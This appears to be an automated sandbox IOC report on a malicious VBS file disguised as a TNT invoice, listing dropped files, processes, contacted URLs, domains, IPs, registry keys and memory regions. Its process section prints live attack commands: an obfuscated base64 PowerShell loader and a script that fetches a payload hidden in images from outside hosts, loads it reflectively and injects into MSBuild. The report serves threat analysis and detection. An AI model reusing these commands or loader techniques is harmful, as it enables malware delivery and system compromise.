IOC Report
TNT Invoicing_pdf.vbs

loading gif

Files

File Path
Type
Category
Malicious
TNT Invoicing_pdf.vbs
Unicode text, UTF-16, little-endian text, with very long lines (771), with CRLF line terminators
initial sample
 malicious
C:\Users\user\AppData\Local\DesktopPic\PicList.txt
ASCII text, with CRLF line terminators
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\z0DWX[1].txt
Unicode text, UTF-8 text, with very long lines (11175), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\-2-2FfKI
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1dyiayc1.1li.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d2ymxetr.jg1.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_th4egcug.bll.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uqlp3gfd.lqx.ps1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TNT Invoicing_pdf.vbs"
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre4DgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDIDgTreNQDgTre4DgTreDgDgTreNDgTreDgTre2DgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre5DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreD8DgTreMQDgTre3DgTreDEDgTreMgDgTre1DgTreDgDgTreODgTreDgTre1DgTreDDgTreDgTreMDgTreDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBEDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreRDgTreBhDgTreHQDgTreYQBGDgTreHIDgTrebwBtDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreC0DgTrebgBlDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEUDgTrebgBjDgTreG8DgTreZDgTreBpDgTreG4DgTreZwBdDgTreDoDgTreOgBVDgTreFQDgTreRgDgTre4DgTreC4DgTreRwBlDgTreHQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreFMDgTreVDgTreBBDgTreFIDgTreVDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTreZQDgTregDgTreDDgTreDgTreIDgTreDgTretDgTreGEDgTrebgBkDgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTredDgTreDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreCsDgTrePQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreUwB1DgTreGIDgTrecwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreLDgTreDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreQwBvDgTreG4DgTredgBlDgTreHIDgTredDgTreBdDgTreDoDgTreOgBGDgTreHIDgTrebwBtDgTreEIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCkDgTreOwDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBSDgTreGUDgTreZgBsDgTreGUDgTreYwB0DgTreGkDgTrebwBuDgTreC4DgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreF0DgTreOgDgTre6DgTreEwDgTrebwBhDgTreGQDgTreKDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTregDgTreD0DgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTreuDgTreEcDgTreZQB0DgTreFQDgTreeQBwDgTreGUDgTreKDgTreDgTrenDgTreFDgTreDgTreUgBPDgTreEoDgTreRQBUDgTreE8DgTreQQBVDgTreFQDgTreTwBNDgTreEEDgTreQwBBDgTreE8DgTreLgBWDgTreEIDgTreLgBIDgTreG8DgTrebQBlDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreVgBBDgTreEkDgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTredDgTreB4DgTreHQDgTreLgBmDgTreGcDgTreLwBlDgTreGMDgTreYQByDgTreGcDgTreLwBwDgTreG8DgTreaDgTreBzDgTreC4DgTrebQBvDgTreG4DgTrebwBjDgTreG4DgTreYQBmDgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCwDgTreJwBNDgTreFMDgTreQgB1DgTreGkDgTrebDgTreBkDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
malicious
C:\Windows\System32\certutil.exe
"C:\Windows\System32\certutil.exe" -decode "" "C:\Users\user\AppData\Local\DesktopPic\WallP.exe"
 malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c dir /b *.png *.jpg *.bmp *.gif>"C:\Users\user\AppData\Local\DesktopPic\PicList.txt"
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469', 'https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.fg/ecarg/pohs.monocnaf//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"
 malicious
C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe
"C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe"
malicious
C:\Windows\SysWOW64\SyncHost.exe
"C:\Windows\SysWOW64\SyncHost.exe"
 malicious
C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe
"C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe"
malicious
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
 malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 3 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
 malicious
https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500
172.67.215.45
 malicious
https://uploaddeimagens.com.br
unknown
 malicious
http://www.rhyme.academy/avr4/?-zd=Xr58V0PHlxJ&0Zut6f=x3E/o0JgLrsAY3mnIEvxKvoKIfHhyrIBWJwB0arEEJoLlbt8V3ExA9cg1sEiGVbm5mLCkgWBOmXsxt02WvVKyLItEbcRwm1+9Ok94pNpJk46kEUPTjVsVLh1d58gSyvREgIt0DM=
216.40.34.41
 malicious
https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469
172.67.215.45
 malicious
https://duckduckgo.com/chrome_newtab
unknown
http://nuget.org/NuGet.exe
unknown
https://twitter.com/hover
unknown
https://duckduckgo.com/ac/?q=
unknown
https://www.instagram.com/hover_domains
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://paste.ee/7
unknown
https://contoso.com/License
unknown
https://www.google.com;
unknown
https://contoso.com/Icon
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
https://analytics.paste.ee
unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
https://paste.ee/d/z0DWX
104.21.84.67
http://uploaddeimagens.com.br
unknown
https://www.ecosia.org/newtab/
unknown
https://github.com/Pester/Pester
unknown
http://fanconom.shop
unknown
https://ac.ecosia.org/autocomplete?q=
unknown
https://www.google.com
unknown
https://fanconom.shop
unknown
https://www.hover.com/domains/results
unknown
https://lesferch.github.io/DesktopPic
unknown
https://paste.ee/#
unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://paste.ee/
unknown
https://analytics.paste.ee;
unknown
https://cdnjs.cloudflare.com
unknown
https://aka.ms/pscore68
unknown
https://cdnjs.cloudflare.com;
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://fanconom.shop/grace/gf.txt
185.61.152.60
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
unknown
https://secure.gravatar.com
unknown
https://themes.googleusercontent.com
unknown
There are 32 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
www.rhyme.academy
216.40.34.41
 malicious
uploaddeimagens.com.br
172.67.215.45
 malicious
bg.microsoft.map.fastly.net
199.232.210.172
paste.ee
104.21.84.67
fanconom.shop
185.61.152.60
fp2e7a.wpc.phicdn.net
192.229.211.108

IPs

IP
Domain
Country
Malicious
172.67.215.45
uploaddeimagens.com.br
United States
malicious
216.40.34.41
www.rhyme.academy
Canada
malicious
104.21.84.67
paste.ee
United States
185.61.152.60
fanconom.shop
United Kingdom

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 4 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
3150000
unkown
page execute and read and write
 malicious
4270000
trusted library allocation
page read and write
 malicious
1E10000
unclassified section
page execute and read and write
 malicious
EA0000
system
page execute and read and write
 malicious
5650000
system
page execute and read and write
 malicious
400000
remote allocation
page execute and read and write
 malicious
42B0000
trusted library allocation
page read and write
 malicious
21D557AB000
heap
page read and write
2AC0000
heap
page read and write
4450000
trusted library allocation
page read and write
29B1000
heap
page read and write
2CAE000
stack
page read and write
21D3DBD2000
trusted library allocation
page read and write
73C000
stack
page read and write
A095DFF000
stack
page read and write
29B1000
heap
page read and write
2C4C000
unclassified section
page execute and read and write
29B1000
heap
page read and write
AA5000
unkown
page read and write
7FFD34783000
trusted library allocation
page execute and read and write
B60000
heap
page read and write
21D3D290000
heap
page execute and read and write
7651000
heap
page read and write
29B1000
heap
page read and write
FC0000
direct allocation
page execute and read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
213EEB14000
heap
page read and write
7FFD34790000
trusted library allocation
page read and write
213EF3CF000
heap
page read and write
5D8C000
unkown
page execute and read and write
1D0585AB000
trusted library allocation
page read and write
C90000
unkown
page readonly
F64000
unkown
page read and write
21D3D768000
trusted library allocation
page read and write
213ED0EB000
heap
page read and write
2832000
heap
page read and write
29B1000
heap
page read and write
21D3B796000
heap
page read and write
213EF2F4000
heap
page read and write
A9E000
unkown
page readonly
8A62000
system
page read and write
3F8C000
unkown
page execute and read and write
2C00000
unkown
page read and write
D80000
heap
page read and write
2654000
heap
page read and write
2837000
heap
page read and write
213EEB24000
heap
page read and write
213EEAF3000
heap
page read and write
2550000
heap
page read and write
CB0000
unkown
page readonly
1D058FAB000
trusted library allocation
page read and write
7FFD34784000
trusted library allocation
page read and write
213EEB32000
heap
page read and write
213EFB5D000
heap
page read and write
7656000
heap
page read and write
2740000
heap
page read and write
404C000
unclassified section
page execute and read and write
7B423E000
stack
page read and write
442F000
heap
page read and write
3A7407C000
stack
page read and write
A0965FE000
stack
page read and write
7FFD34830000
trusted library allocation
page read and write
213EFB5D000
heap
page read and write
7699000
heap
page read and write
213EF3EA000
heap
page read and write
A90000
unkown
page readonly
21D3DD54000
trusted library allocation
page read and write
AC0000
unkown
page readonly
2803000
heap
page read and write
F50000
heap
page read and write
21D3B74B000
heap
page read and write
3A0000
unkown
page readonly
21D55A36000
heap
page read and write
1D05596A000
trusted library allocation
page read and write
27D0000
heap
page read and write
29B1000
heap
page read and write
2750000
unkown
page execute and read and write
7FFD349F0000
trusted library allocation
page read and write
A095CB3000
stack
page read and write
21D3DD78000
trusted library allocation
page read and write
111F000
heap
page read and write
213ED0D8000
heap
page read and write
7C3E000
stack
page read and write
1D053790000
heap
page read and write
213EF3D7000
heap
page read and write
7668000
heap
page read and write
A90000
unkown
page readonly
213ED09C000
heap
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
21D55A38000
heap
page read and write
7FFD34A60000
trusted library allocation
page read and write
29B1000
heap
page read and write
63A000
stack
page read and write
29B1000
heap
page read and write
27CD000
heap
page read and write
498C000
unkown
page execute and read and write
7B42BB000
stack
page read and write
4450000
trusted library allocation
page read and write
213EFA36000
heap
page read and write
213EF36D000
heap
page read and write
1286000
direct allocation
page execute and read and write
DCE000
stack
page read and write
27FE000
heap
page read and write
213EF040000
heap
page read and write
1235000
heap
page read and write
9C0000
unkown
page read and write
213ED09F000
heap
page read and write
29B1000
heap
page read and write
1D05B7AB000
trusted library allocation
page read and write
213EF490000
trusted library allocation
page read and write
213EF302000
heap
page read and write
2777000
heap
page read and write
29B1000
heap
page read and write
27CD000
heap
page read and write
280C000
heap
page read and write
7694000
heap
page read and write
213EF3A1000
heap
page read and write
1D05558C000
trusted library allocation
page read and write
213EEAE5000
heap
page read and write
427C000
heap
page read and write
29B1000
heap
page read and write
1D05BA32000
trusted library allocation
page read and write
1486ECD9000
heap
page read and write
213EF367000
heap
page read and write
2779000
heap
page read and write
29B1000
heap
page read and write
213ECFF9000
heap
page read and write
29B1000
heap
page read and write
1210000
unkown
page readonly
2CB4000
heap
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
1486EB10000
heap
page read and write
88E000
stack
page read and write
4A4C000
unclassified section
page execute and read and write
29B1000
heap
page read and write
1D05D88E000
trusted library allocation
page read and write
213EEB0A000
heap
page read and write
DF0000
unkown
page read and write
213ED049000
heap
page read and write
213EF990000
heap
page read and write
213EFA5B000
heap
page read and write
2740000
heap
page read and write
1486EC80000
heap
page read and write
C90000
unkown
page readonly
29B1000
heap
page read and write
3A7417E000
stack
page read and write
277D000
heap
page read and write
7B403C000
stack
page read and write
D1A000
stack
page read and write
1D05D890000
trusted library allocation
page read and write
29B1000
heap
page read and write
7BBE000
stack
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
D50000
unkown
page readonly
4FF4000
unclassified section
page read and write
1040000
unkown
page readonly
29B1000
heap
page read and write
CA0000
unkown
page readonly
29B1000
heap
page read and write
4270000
trusted library allocation
page read and write
213ED09C000
heap
page read and write
594F000
stack
page read and write
213ED338000
heap
page read and write
7FFD349C0000
trusted library allocation
page read and write
2650000
heap
page read and write
1D055929000
trusted library allocation
page read and write
76C9000
heap
page read and write
27D0000
heap
page read and write
213EEB30000
heap
page read and write
1D069806000
trusted library allocation
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
29B1000
heap
page read and write
DF0000
unkown
page read and write
1D05D83B000
trusted library allocation
page read and write
1410000
unkown
page readonly
21D3B70F000
heap
page read and write
29B1000
heap
page read and write
21D3DA5D000
trusted library allocation
page read and write
48AD000
direct allocation
page execute and read and write
42F0000
trusted library allocation
page read and write
770000
heap
page read and write
2807000
heap
page read and write
7FFD3483C000
trusted library allocation
page execute and read and write
213EEB30000
heap
page read and write
1D0571AB000
trusted library allocation
page read and write
213EF32F000
heap
page read and write
21D3B8F0000
heap
page read and write
213EF090000
remote allocation
page read and write
1230000
heap
page read and write
29B1000
heap
